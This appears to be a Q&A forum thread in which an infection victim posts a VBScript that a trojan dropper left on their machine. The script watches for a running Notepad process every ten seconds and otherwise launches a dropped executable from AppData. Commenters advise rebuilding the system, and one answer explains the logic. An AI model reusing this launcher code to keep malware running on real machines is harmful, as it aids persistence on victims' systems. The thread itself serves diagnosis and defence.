# Can someone help me understand this code ? Infected with Trojan Dropper VBS script

Tags: vbscript, virus, trojan

I wanna say sorry first ,

This isnt probly the best place to ask things like these , but i was infected by a virus and it seems to left traces.

If someone can understand the code behind some scripts i would be very grateful.

```
Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else 
    Do
        Pause(10) ' Pause 10 seconds 
        If CheckProcess(DblQuote(ProcessPath)) = False Then
            Call Logoff() 
        End If  
    Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
    strComputer = "."
    Tab = Split(ProcessPath,"\")
    ProcessName = Tab(UBound(Tab))
    ProcessName = Replace(ProcessName,Chr(34),"")
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'")
    If colProcesses.Count = 0 Then
        CheckProcess = False
    Else
        CheckProcess = True
    End if
End Function
'**************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
   Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit 
End sub
'**************************************************************************
Sub Pause(Secs)    
    Wscript.Sleep(Secs * 1000)    
End Sub   
'**************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function    
'***************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "\", "\\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'****************************************************************************
```

I hope i formated the code right , there is some other script but in a txt form , the diference is in **objShell.Exec** it remotes to **"%working%"** , like this:

```
objShell.Exec("%working%")^
```

I'm gonna post pastebin's of it if it makes it easier

[AppVShNotifytvbs.vbs PasteBin link](https://pastebin.com/HE5Hr75E)

[AppVShNotifytvbs.txt Pastebin link](https://pastebin.com/uxMKLsCJ)

Comment: I'm voting to close this question as off-topic because it belongs on [Information Security](https://security.stackexchange.com/).

Comment: Just i wonder where did you get this vbscript ? i mean the original script not the modified one ?

Comment: i fired up a suspicious program , some quick cmd pop up for an instance while it was running , i rushed to scan the system and there it was , the script was exactly by the exe ( both of them ) as some xml files and non extension ones . The main program acted like a trojan dropper that seems to got AppVShNotifyt.exe and those scrips in my drive.

Comment: [Read](http://technet.microsoft.com/en-us/library/cc512587.aspx). Backup. Flatten. Rebuild.

Comment: i've found a similar analysis ( both the codes in the files are the same ) and the sha256 match's 

https://www.hybrid-analysis.com/sample/aa9bb1a1962c6e1edd1a0f2024b853409fe5fa83297ebd5b4ce4f2014d6a3ebd?environmentId=100

Do you think i should format the entire system then ?
Can i ask you if you can take a look in that link and try to help me ? Im really no expert but the behavior is kite similiar.

Comment: *Do you think i should format the entire system then?* Yes, I do. What wasn't clear enough about that before?

Answer (score 0):

First, it check previous instance to see that the current script is already running using another process ID.

Then, every 10 seconds is checks if notepad is running.  If it's not, it calls AppVShNotifyt.exe